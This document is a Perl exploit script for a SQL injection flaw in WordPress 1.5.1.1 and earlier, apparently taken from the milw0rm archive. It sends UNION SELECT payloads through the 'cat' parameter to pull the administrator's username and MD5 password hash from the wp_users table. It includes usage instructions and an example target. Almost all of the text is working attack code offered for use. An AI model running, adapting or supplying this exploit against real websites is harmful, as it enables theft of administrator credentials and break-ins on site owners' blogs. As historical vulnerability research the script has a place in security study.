#!/usr/bin/perl -w
#
# SQL Injection Exploit for WordPress <= 1.5.1.1
# This exploit shows the username of the administrator of the blog and his
# password crypted in MD5, you must only choose the correct version of the target
# Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml
# Patch: download the last version at http://wordpress.org/download/
# Coded by Alberto Trivero

use LWP::Simple;

print "\n\t====================================\n";
print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
print "\t=        by Alberto Trivero        =\n";
print "\t====================================\n\n";

if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {
   print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n";
   print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n";
   exit(0);
}

$page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1);
$page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2);
print "[+] Connected to: $ARGV[0]\n";
$page=~m/:([a-f0-9]{32}):(.*?):/;
print "[+] Username of administrator is: $2\n" if($2);
print "[+] MD5 hash of password is: $1\n" if($1);
print "[-] Unable to retrieve username\n" if(!$2);
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-06-22]